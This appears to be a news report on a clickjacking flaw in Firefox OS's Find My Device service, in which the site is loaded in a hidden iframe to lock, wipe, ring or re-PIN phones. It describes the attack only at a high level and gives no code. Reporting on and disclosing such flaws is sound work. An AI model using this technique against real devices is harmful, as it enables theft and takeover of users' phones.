Security researchers have discovered that Mozilla's Firefox Find My Device feature can allow hackers to wipe or lock phones running on the Firefox operating system and even change the device's PINs.
Similar to the feature offered by Apple for iPhone users, the Firefox Find My Device service grants users who have lost their smartphones running on the Firefox operating system to lock the device or pin its location on a map, which can help them recover the handset or even provide law enforcement authorities its exact location to help nab the thief.
However, Egyptian security researcher Mohamed A. Baset has discovered a vulnerability in Firefox Find My Device that allows hackers to remotely wipe out smartphones running on the Firefox operating system. Baset found that hackers can load the Firefox Find My Device website inside a hidden iframe on other websites using simple clickjacking techniques. The attacks can be then carried out on the device to lock or unlock the phone's screen, set a new PIN, or make the handset ring at maximum volume for one minute, despite the user placing it in the vibrate or silent mode.
The vulnerability allows criminals who steal phones to craft a Web interface, which can then be used to unlock PIN-protected phones by simply pushing a button. According to Baset, the National Institute of Standards and Technology has given the vulnerability in Firefox Find My Device a CSVV (Common Vulnerability Scoring System) a score of 7.8 out of 10, but a score of 10 out of 10 for exploitability. This indicates that even hackers lacking very good technical skills could launch an attack by exploiting the vulnerability in the Firefox Find My Device feature.
The security vulnerability appears to be the same as the one discovered by Baset last year and a variation of the CVE-2014-8346 vulnerability found to affect the Samsung Find My Mobile service.